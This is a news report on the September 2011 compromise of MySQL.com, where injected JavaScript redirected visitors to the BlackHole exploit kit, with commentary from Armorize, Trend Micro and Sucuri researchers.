Cyber-criminals injected JavaScript code to divert visitors from MySQL.com to a malicious site hosting BlackHole malware toolkit in a drive-by-download attack.
Unknown attackers compromised the main Website of open-source
database MySQL and served malware to unsuspecting visitors for a short
period of time on Sept. 26.
Attackers injected JavaScript code on MySQL.com, owned by
Oracle, to divert visitors to malicious Websites hosting the BlackHole exploit
kit, which automatically downloaded malware to the victimized computers,
according to Wayne Huange, founder, president and CEO of Armorize
Technologies. The company said the attack has been disabled and the site is
no longer serving up malware.
The main page of MySQL.com was compromised to force visitors
to load a JavaScript file, Huang wrote on the Armorize blog. The file created
an IFRAME that redirected the victim unknowingly to a page hosted at
falosfax.in, hosted in Florida and again to a .cx.cc domain hosted in Sweden. Once
on the page, the BlackHole kit hosted on the site exploited the user's Web
browser and installed plug-ins to download malware. Attackers modified a
JavaScript file used by the Omniture SiteCatalyst plug-in, used to track Website
metrics, for this attack.
"The visitor doesn't need to click or agree to
anything; simply visiting mysql.com with a vulnerable browsing platform will
result in an infection," Huang wrote.
BlackHole is a widely used kit that contains pre-loaded
exploits for vulnerabilities in Web browsers and in other Web components and
plug-ins, such as Flash Player, Adobe Reader and Java. It takes advantage of
unpatched software to compromise the machine. The drive-by-download attack is a
common technique and often relies on JavaScript to silently redirect users to
malicious sites without their knowing.
Eight out of 44 major security vendors currently detect the
malware, according to malware tracker VirusTotal.
Trend Micro researchers found evidence that attackers were
selling root access to some of the cluster servers of mysql.com and its
subdomains on underground criminal forums. The seller was offering a shell
console window with root access to these servers for $3,000, Maxim Goncharov, a
senior threat researcher at Trend
Micro wrote on the Malware blog.
Cyber-criminals are "brazen" enough to sell administrative
access to specific systems, Goncharov wrote.
It appears that the site was initially compromised by a
JavaScript malware which is often related to stolen FTP passwords, according to
researchers at Sucuri
Security. The malware likely compromised a computer belonging to a member
of the MySQL.com team and stole the password from the FTP client, Sucuri
researchers wrote on the blog.
MySQL is an open-source database that originally was owned
by an independent entity, but was purchased by Sun Microsystems in 2008. It later
became part of Oracle when that company bought Sun in 2009. Trend Micro's
Goncharov said the team contacted MySQL last week but hadn't received a
response. The site appeared to be serving up malware for about a three-hour
window in the middle of the day.
With root access available for sale, it is possible that the
malicious perpetrator who originally compromised mysql.com is not the one
responsible for the BlackHole attack that served up malware on the site.
Email
Print
